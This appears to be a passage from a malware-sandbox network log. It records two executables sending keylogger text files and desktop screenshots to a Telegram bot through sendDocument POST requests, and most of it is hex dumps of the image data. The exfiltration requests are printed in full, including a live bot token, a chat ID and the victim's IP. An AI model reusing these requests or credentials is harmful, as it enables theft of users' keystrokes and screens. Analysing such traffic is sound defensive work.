                                                                                      2024-11-27 19:46:54 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 53 52 77 70 78 50 42 47 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotSRwpxPBG.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-27 19:46:54 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:46:54 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:46:54 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:46:54 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:46:54 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:46:54 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:46:54 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:46:54 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:46:54 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:05 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:04 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 553
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.549794149.154.167.2204434848C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-27 19:47:02 UTC556OUTPOST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 2812
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:02 UTC2812OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 43 52 49 42 4a 56 6d 43 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 31 34 3a 34 36 3a 32 37 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 31 34 3a 34 36 3a 32 37 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 31 34 3a 34 36 3a 32 38 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataCRIBJVmC.txt"Content-Type: application/octet-stream[14:46:27]<<Program Manager>>[14:46:27]<<Program Manager>>[14:46:28]<<Program Mana
                                                                                      2024-11-27 19:47:05 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:05 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 547
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-27 19:47:05 UTC547INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 37 33 36 38 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":3546,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736825,"document":{"file_name":"KeyD


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.549795149.154.167.2204434676C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-27 19:47:06 UTC556OUTPOST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 4132
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:06 UTC4132OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 59 76 70 78 6b 6b 50 51 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 31 34 3a 34 36 3a 32 37 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 31 34 3a 34 36 3a 32 37 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 31 34 3a 34 36 3a 32 37 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataYvpxkkPQ.txt"Content-Type: application/octet-stream[14:46:27]<<Program Manager>>[14:46:27]<<Program Manager>>[14:46:27]<<Program Mana
                                                                                      2024-11-27 19:47:07 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:07 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 547
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-27 19:47:07 UTC547INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 37 33 36 38 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":3547,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736827,"document":{"file_name":"KeyD


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.549798149.154.167.2204434848C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-27 19:47:17 UTC559OUTPOST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:17 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 59 70 4a 52 6b 78 4a 48 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotYpJRkxJH.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-27 19:47:17 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:17 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
